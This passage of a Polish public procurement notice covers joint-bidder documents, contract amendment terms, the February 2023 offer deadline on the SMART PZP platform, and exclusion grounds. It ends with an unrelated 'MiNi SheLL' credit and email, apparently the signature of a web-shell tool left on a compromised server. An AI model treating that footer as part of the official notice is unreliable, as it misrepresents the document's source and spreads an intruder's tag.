1 pkt 4 ustawy Pzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (poz. 835).<br/>7. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia publicznego zobowiązani są złożyć wraz z<br/>ofertą:<br/>7.1. stosowne pełnomocnictwo uprawniające do wykonywania określonych czynności w postępowaniu o udzieleniu<br/>zamówienia publicznego;<br/>7.2. oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy – art. 117 ust. 4 ustawy PZP .<br/>8. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego dokumenty wymienione w<br/>Rozdziale 10 w pkt. 1.5. - zobowiązani są złożyć oddzielnie dla każdej z firm. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Przyszłe zobowiązania wykonawcy związane z umową i jej realizacją są określone przepisami ustawy z dnia 11 września<br/>2019r. Prawo zamówień publicznych (Dz.U. z 2022 r., poz. 1710 z późn.zm) oraz przepisami Kodeksu Cywilnego.<br/>2. Zamawiający wymaga, aby wybrany w danym zadaniu wykonawca zawarł z nim umowę na warunkach określonych w<br/>projekcie umowy stanowiącym załącznik Nr 5a/5b do SWZ.<br/>3. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartych umów w przypadkach i na warunkach<br/>określonych w ogólnych warunków umowy (Załącznik 5a/5b - § 14 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z dokumentami określonymi w ROZDZIALE 10 pkt.1 SWZ należy złożyć za pośrednictwem platformy SMART PZP pod adresem: https://portal.smartpzp.pl/41blsz/module/lista_zadan na stronie dotyczącej przedmiotowego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-20 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia na<br/>podstawie:<br/>• art. 108 ust. 1 ustawy Pzp;<br/>• art. 109 ust. 1 pkt. 2), 3), 4) ustawy Pzp;<br/>• art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (poz. 835 z późń.zm.).<br/>Dodatkowe informacje:<br/>1. Oferty wariantowe<br/>Zamawiający nie przewiduje możliwości składania ofert wariantowych.<br/>2. Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów<br/>elektronicznych do oferty;<br/>3.Umowa ramowa<br/>Zamawiający nie przewiduje zawarcia umowy ramowej;<br/>4. Aukcja elektroniczna<br/>Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej;<br/>5. Zamówienia, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp<br/>Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu wykonawcy usług, o których mowa w art. 214 ust. 1<br/>pkt 8 ustawy Pzp, polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego.<br/>6. Rozliczenia w walutach obcych<br/>Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>7. Zwrot kosztów udziału w postępowaniu<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>8. Zaliczki na poczet udzielenia zamówienia<br/>Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>9. Unieważnienie postępowania<br/>Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 ustawy<br/>Pzp oraz na podstawie art. 256 ustawy Pzp. Zgodnie z art. 310 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość<br/>unieważnienia przedmiotowego postępowania, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie<br/>całości lub części zamówienia, nie zostały mu przyznane.<br/>10. Rozliczenia między Zamawiającym, a Wykonawcą.<br/>Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w złotych polskich (PLN).<br/>11. Postępowanie prowadzone jest w języku polskim.

Creat By MiNi SheLL
Email: jattceo@gmail.com